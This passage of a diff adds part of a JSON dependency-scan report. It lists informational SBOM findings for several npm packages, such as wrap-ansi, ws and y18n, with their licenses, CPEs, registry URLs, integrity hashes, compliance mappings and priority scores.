"MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:wrap-ansi:wrap-ansi:7.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:wrap-ansi:wrap_ansi:7.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:wrap_ansi:wrap-ansi:7.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:wrap_ansi:wrap_ansi:7.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:wrap:wrap-ansi:7.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:wrap:wrap_ansi:7.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/wrap-ansi@7.0.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-7.0.0.tgz", + "integrity": "sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==", + "dependencies": { + "ansi-styles": "^4.0.0", + "string-width": "^4.1.0", + "strip-ansi": "^6.0.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "686325d7e763de93", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: wrap-ansi 8.1.0", + "title": "wrap-ansi 8.1.0", + "description": "Package discovered: wrap-ansi 8.1.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "49a7c54fcd626265", + "name": "wrap-ansi", + "version": "8.1.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:wrap-ansi:wrap-ansi:8.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:wrap-ansi:wrap_ansi:8.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:wrap_ansi:wrap-ansi:8.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:wrap_ansi:wrap_ansi:8.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:wrap:wrap-ansi:8.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:wrap:wrap_ansi:8.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/wrap-ansi@8.1.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-8.1.0.tgz", + "integrity": "sha512-si7QWI6zUMq56bESFvagtmzMdGOtoxfR+Sez11Mobfc7tm+VkUckk9bW2UeffTGVUbOksxmSw0AA2gs8g71NCQ==", + "dependencies": { + "ansi-styles": "^6.1.0", + "string-width": "^5.0.1", + "strip-ansi": "^7.0.1" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "20b8ef0a2e52c375", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: wrappy 1.0.2", + "title": "wrappy 1.0.2", + "description": "Package discovered: wrappy 1.0.2", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "3d054461229ae629", + "name": "wrappy", + "version": "1.0.2", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "ISC", + "spdxExpression": "ISC", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:wrappy:wrappy:1.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/wrappy@1.0.2", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", + "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "d249fddb72dddcbc", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: ws 8.18.3", + "title": "ws 8.18.3", + "description": "Package discovered: ws 8.18.3", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "20d4f853542f41c9", + "name": "ws", + "version": "8.18.3", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:ws_project:ws:8.18.3:*:*:*:*:node.js:*:*", + "source": "nvd-cpe-dictionary" + } + ], + "purl": "pkg:npm/ws@8.18.3", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/ws/-/ws-8.18.3.tgz", + "integrity": "sha512-PEIGCY5tSlUt50cqyMXfCzX+oOPqN0vuGqWzbcJ2xvnkzkq46oOpz7dQaTDBdfICb4N14+GARUDw2XV2N4tvzg==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "c71da5915aeb2537", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: xmlbuilder 13.0.2", + "title": "xmlbuilder 13.0.2", + "description": "Package discovered: xmlbuilder 13.0.2", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "0872acd31442749a", + "name": "xmlbuilder", + "version": "13.0.2", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:xmlbuilder:xmlbuilder:13.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/xmlbuilder@13.0.2", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/xmlbuilder/-/xmlbuilder-13.0.2.tgz", + "integrity": "sha512-Eux0i2QdDYKbdbA6AM6xE4m6ZTZr4G4xF9kahI2ukSEMCzwce2eX9WlTI5J3s+NU7hpasFsr8hWIONae7LluAQ==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "fd4707cd0572bee3", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: xmlhttprequest-ssl 2.1.2", + "title": "xmlhttprequest-ssl 2.1.2", + "description": "Package discovered: xmlhttprequest-ssl 2.1.2", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "9551f10f27f0ee2d", + "name": "xmlhttprequest-ssl", + "version": "2.1.2", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:xmlhttprequest-ssl:xmlhttprequest-ssl:2.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:xmlhttprequest-ssl:xmlhttprequest_ssl:2.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:xmlhttprequest_ssl:xmlhttprequest-ssl:2.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:xmlhttprequest_ssl:xmlhttprequest_ssl:2.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:xmlhttprequest:xmlhttprequest-ssl:2.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:xmlhttprequest:xmlhttprequest_ssl:2.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/xmlhttprequest-ssl@2.1.2", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/xmlhttprequest-ssl/-/xmlhttprequest-ssl-2.1.2.tgz", + "integrity": "sha512-TEU+nJVUUnA4CYJFLvK5X9AOeH4KvDvhIfm0vV1GaQRtchnG0hgK5p8hw/xjv8cunWYCsiPCSDzObPyhEwq3KQ==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "a5a624f94f45bfc0", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: xtend 4.0.2", + "title": "xtend 4.0.2", + "description": "Package discovered: xtend 4.0.2", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "6f2d4b5e4aa5bc10", + "name": "xtend", + "version": "4.0.2", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:xtend:xtend:4.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/xtend@4.0.2", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/xtend/-/xtend-4.0.2.tgz", + "integrity": "sha512-LKYU1iAXJXUgAXn9URjiu+MWhyUXHsvfp7mcuYm9dSUKK0/CjtrUwFAxD82/mCWbtLsGjFIad0wIsod4zrTAEQ==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "5d318a2cd2d1309b", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: y18n 4.0.3", + "title": "y18n 4.0.3", + "description": "Package discovered: y18n 4.0.3", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "f92fb588898c98cc", + "name": "y18n", + "version": "4.0.3", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "ISC", + "spdxExpression": "ISC", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:y18n_project:y18n:4.0.3:*:*:*:*:node.js:*:*", + "source": "nvd-cpe-dictionary" + } + ], + "purl": "pkg:npm/y18n@4.0.3", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/y18n/-/y18n-4.0.3.tgz", + "integrity": "sha512-JKhqTOwSrqNA1NY5lSztJ1GrBiUodLMmIZuLiDaMRJ+itFd+ABVE8XBjOvIWL+rSqNDC74LCSFmlb/U4UZ4hJQ==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "ff7837262c7a0506", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: y18n 5.0.8", + "title": "y18n 5.0.8", + "description": "Package discovered: y18n 5.0.8", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "17090a29739955b3", + "name": "y18n", + "version": "5.0.8", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "ISC", + "spdxExpression": "ISC", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:y18n_project:y18n:5.0.8:*:*:*:*:node.js:*:*", + "source": "nvd-cpe-dictionary" + } + ], + "purl": "pkg:npm/y18n@5.0.8", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/y18n/-/y18n-5.0.8.tgz", + "integrity": "sha512-0pfFzegeDWJHJIAmTLRP2DwHjdF5s7jo9tuztdQxAhINCdvS+3nGINqPd00AphqJR/0LhANUS6/+7SCb98YOfA==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "20985a40c61069a1", + "ruleId": "SBOM.PACKAGE", + "severity": 